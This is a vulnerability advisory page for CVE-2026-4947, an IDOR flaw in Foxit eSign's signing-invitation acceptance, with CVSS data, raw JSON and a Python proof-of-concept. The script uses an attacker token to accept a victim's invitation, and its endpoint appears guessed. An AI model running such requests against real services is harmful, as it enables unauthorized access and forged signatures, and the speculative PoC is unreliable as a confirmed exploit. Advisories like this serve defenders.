Security Vulnerability Report
CVE-2026-4947 CVSS 7.1 HIGH

CVE-2026-4947

Published: 2026-04-01 02:16:04
Last Modified: 2026-04-27 13:14:44
Source: 14984358-7092-470d-8f34-ade47a7658a2

Description

Addressed a potential insecure direct object reference (IDOR) vulnerability in the signing invitation acceptance process. Under certain conditions, this issue could have allowed an attacker to access or modify unauthorized resources by manipulating user-supplied object identifiers, potentially leading to forged signatures and compromising the integrity and authenticity of documents undergoing the signing process. The issue was caused by insufficient authorization validation on referenced resources during request processing.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:foxit:esign:*:*:*:*:*:*:*:* - VULNERABLE
Foxit eSign (see the vendor's official security bulletin for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def test_idor_vulnerability(target_url, attacker_token, victim_invitation_id):
    """
    PoC for CVE-2026-4947: IDOR in signing invitation acceptance.
    Attempts to accept a victim's invitation using an attacker's low-privilege token.
    """
    headers = {
        "Authorization": f"Bearer {attacker_token}",
        "Content-Type": "application/json",
        "User-Agent": "CVE-2026-4947-Scanner",
    }
    # The vulnerable endpoint usually accepts a JSON payload with the invitation ID
    payload = {
        "invitation_id": victim_invitation_id,
        "action": "accept",
    }
    try:
        response = requests.post(target_url, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Potential IDOR vulnerability confirmed!")
            print(f"[+] Response: {response.text}")
            return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")
        return False


if __name__ == "__main__":
    # Example usage
    TARGET_API = "https://target.example.com/api/v1/invitations/accept"
    ATTACKER_TOKEN = "ATTACKER_LOW_PRIVILEGE_TOKEN_HERE"
    VICTIM_ID = "10023"  # ID guessed or obtained belonging to another user
    test_idor_vulnerability(TARGET_API, ATTACKER_TOKEN, VICTIM_ID)
```

References

https://www.foxit.com/support/security-bulletins.html (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4947",
    "sourceIdentifier": "14984358-7092-470d-8f34-ade47a7658a2",
    "published": "2026-04-01T02:16:03.740",
    "lastModified": "2026-04-27T13:14:44.270",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Addressed a potential insecure direct object reference (IDOR) vulnerability in the signing invitation acceptance process. Under certain conditions, this issue could have allowed an attacker to access or modify unauthorized resources by manipulating user-supplied object identifiers, potentially leading to forged signatures and compromising the integrity and authenticity of documents undergoing the signing process. The issue was caused by insufficient authorization validation on referenced resources during request processing."
      },
      {
        "lang": "es",
        "value": "Se abordó una posible vulnerabilidad de referencia directa a objeto inseguro (IDOR) en el proceso de aceptación de invitación de firma. Bajo ciertas condiciones, este problema podría haber permitido a un atacante acceder o modificar recursos no autorizados manipulando identificadores de objeto proporcionados por el usuario, lo que podría llevar a firmas falsificadas y comprometer la integridad y autenticidad de los documentos en proceso de firma. El problema fue causado por una validación de autorización insuficiente en los recursos referenciados durante el procesamiento de solicitudes."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "14984358-7092-470d-8f34-ade47a7658a2",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "14984358-7092-470d-8f34-ade47a7658a2",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:foxit:esign:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2026-03-26",
                "matchCriteriaId": "6BF12318-45A0-415D-B898-38513F760C3A"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.foxit.com/support/security-bulletins.html",
        "source": "14984358-7092-470d-8f34-ade47a7658a2",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```